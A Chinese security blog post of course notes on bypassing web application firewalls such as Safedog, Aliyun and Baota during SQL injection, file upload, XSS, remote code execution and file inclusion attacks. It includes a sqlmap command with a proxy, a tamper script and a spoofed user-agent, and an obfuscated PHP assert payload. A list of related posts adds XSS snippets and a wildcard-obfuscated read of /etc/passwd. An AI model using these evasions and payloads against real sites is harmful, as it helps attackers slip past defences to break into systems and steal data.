【WAF绕过-4】漏洞利用之注入上传跨站等绕过

最新推荐文章于 2023-04-14 20:53:49 发布
最新推荐文章于 2023-04-14 20:53:49 发布
阅读量334 收藏
点赞数
分类专栏: 小迪安全笔记 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41889600/article/details/128392368
版权

在这里插入图片描述

1、SQL注入

如需sqlmap注入测试,
防cc拦截:修改user-agent头+代理(付费代理池)
修改user-agent头:
(1)加参数:--random-agent
(2)加参数:--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
各大搜索引擎的User-Agent:https://www.cnblogs.com/iack/p/3557371.html

在这里插入图片描述

(3)修改配置文件sqlmap.conf中的agent变量值
加代理:--proxy="http:tps123.kdlapi.com:15818"
绕过安全狗:自写tamper模块,参考如下waf-dog.py
绕过Aliyun:基本修改指纹即可(修改user-agent头)
*绕过宝塔:匹配关键字外加/

python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --random-agent

2、文件上传
1.php 截断,参考之前payload上传,绕过waf
和前面文件上传专题的绕过方法一样。
3、XSS跨站
利用xss trike绕过,加上–timeout或者–proxy绕过cc

4、RCE执行

加密编码绕过?算法可逆?关键字绕过?提交方法?各种测试?

txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce

5、文件包含
以下几种:…\ …/ …\等

涉及资源:
宝塔官网:https://www.bt.cn/
safedog官网:http://free.safedog.cn/website_safedog.html
参考:https://www.cnblogs.com/darkerg/p/14779017.html

阿福超级胖
关注
专栏目录
WAF绕过漏洞利用——漏洞利用注入上传跨站绕过
m0_61506558的博客
10-05 1104
这里介绍常见的漏洞利用绕过方法方法有很多很多,一定要有自己的思想,就拿逻辑漏洞来说,AWVS、AppScan、Xray、Nessus、Sqlmap......这些自动化工具是扫描不出来的,加密编码绕过?算法可逆?关键字绕过?提交方法?各种测试?要学会尝试自己造轮子,本篇文章引入几种简单方式,希望打开大家思路之前简单总结过,感兴趣的(一)SQL注入
44-5 waf绕过 - SQL注入WAF方法
最新发布
weixin_43263566的博客
06-04 149
内联注释是一种特殊的注释格式,在其后面紧跟着数据库版本号时,如果实际的数据库版本等于或高于该字符串,则应用程序会将注释内容解释为SQL语句,否则将其视为注释处理。默认情况下,如果没有指定版本号,内联注释中的内容将会执行。首先经过测试发现安全狗并不是直接过滤 and 关键字,而是过滤 adn + 一个表达式,如:and 1=1 这种才会被过滤。如果你要使用order by进行爆列,会发现也被过滤了,绕过:使用 group by 绕过。/ 之后的注释内容则会被真正地注释掉,失去作用。
WAF绕过-漏洞利用注入上传跨站绕过
硫酸超的博客
10-02 2449
WAF绕过-漏洞利用注入上传跨站绕过SQL 注入文件上传XSS 跨站其他集合 SQL 注入 如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块 安全狗:参考之前 payload(现在不行了) from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGH def tamper(payload, **kwargs): retVal = "" if payload:
安恒月赛 image up
weixin_30900589的博客
11-30 571
http://101.71.29.5:10007/index.php?page=login 仔细观察这个url的话会发现,存在文件包含。 而且并没有login.php而是login,猜测代码是 <?php include str."php"; 随便账号密码就能登陆,来到了一个上传页面,只能上传图片,回头看看题目 这里的思路明确了,文件包含加图片马。 在这时间统一的世界里,上传图...
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
XSS触发语句小结
7Riven's blog
01-01 2113
一、标准语句 <script>alert(/XSS/)</script> 二、尝试大小写 <sCript>alert(1)</scRipt> 三、使用<img>标签 1、windows事件 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("...
渗透测试工具库-收藏版
baidu_38876334的博客
04-14 1051
浩二一开始做渗透测试的时候收集超多的资料和工具,一直在文档里吃灰。对BillGates Linux Botnet系木马活动的监控工具。
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
WEB 漏洞-SQL 注入之堆叠及 WAF 绕过注入 SQL 注入是一种常见的 WEB 漏洞攻击方式,通过将恶意 SQL 语句嵌入到 Web 应用程序的输入参数中,从而访问、修改或控制数据库的数据。堆叠注入(Stacked Injections)是 ...
漏洞利用WAF绕过
Mr_helloword的博客
09-07 1048
命令执行WAF绕过 1.通配符 符号 含义 ? 匹配单个字符如果匹配多个字符,就需要多个?连用 * *代表任意数量的字符 [ ] 代表一定有一个在括号内的字符(非任意字符)。例如 [abcd] 代表一定有一个字符, 可能是 a, b, c, d 这四个任何一个 利用通配符执行以下命令: ls -l 使用通配符 /?in/?s -l 读取/etc/passwd: /???/??t /??c/p???w? 有时候WAF不允许使用太多的?号 /?in/cat /?tc/p?sswd
waf绕过-成功使用扫描器
MSB_WLAQ的博客
10-06 1672
大佬轻喷,本篇都是一些基本的骚操作,小白不易,谢谢。 各位表哥们在做项目的和挖src的时候,想挖出尽可能多的漏洞。这时在已经授权的情况下,开启扫描器一顿ak狂扫,说不定可以收获几个洞洞,但是烦恼来了,有waf,这就导致了误报,更直接的就是被ban了ip。 这真是个悲伤的故事。为了解决这种情况的发生,我们先来探讨waf的拦截机制 waf拦截机制 扫描速度过快被ban 自动扫描器在开扫时,就会在短时间内发送大量的数据包,这对服务器会造成负荷,影响服务器运行,waf自然会对其进行拦截。 w.
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
CTF平台题库writeup(四)--BugKuCTF-代码审计(14题详解)
渗透、攻防、CTF、编程
07-04 4457
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
伪造XFF头绕过服务器IP过滤
weixin_34367845的博客
11-20 1265
IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF头进行IP伪造 XFF字段 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。通俗来说,就是浏览器访问网站的IP。一般格式: X-Forwarded-For:...
安恒12月赛Web题解
0verWatch的博客
12-22 2930
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
CTF-Web-SQL注入
beihai2013
01-26 3315
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
Simple Calc Writeup
子曰小玖的博客
05-23 1221
https://sploitfun.wordpress.com/2016/03/07/bkp-ctf-simple-calc-writeup/ Recently I got my hands dirty with CTF. My first attempt was 32c3 and I failed miserably at it, however my second attempt was f...
CTF Web题 部分WP
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
绕过阿里云盾进行XSS
weixin_34221036的博客
11-16 2579
Payload如下所示: 1 <imgsrc=#onerror=alert`2`> 本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1944532,如需转载请自行联系原作者 ...
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2443
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值